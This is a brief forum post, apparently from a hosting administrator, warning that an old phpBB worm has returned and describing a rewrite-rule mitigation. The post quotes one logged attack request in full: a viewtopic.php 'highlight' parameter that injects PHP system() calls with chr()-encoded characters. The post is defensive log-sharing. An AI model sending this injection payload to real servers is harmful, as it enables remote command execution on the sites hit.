old phpbb worm re-awakened

We just added a global modrewrite to our shared cluster to mitigate a ~20hit/sec 9Mb/sec blast of phpBB attacks coming from over 1300 unique IPs.

It's this old one from last month:

GET /phpBB2/viewtopic.php?t=250&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Ech r(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Ec hr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527

mod_security has a nice solution for this one too. May want to check your logs and who's banging on you.

 

 

 

 

Top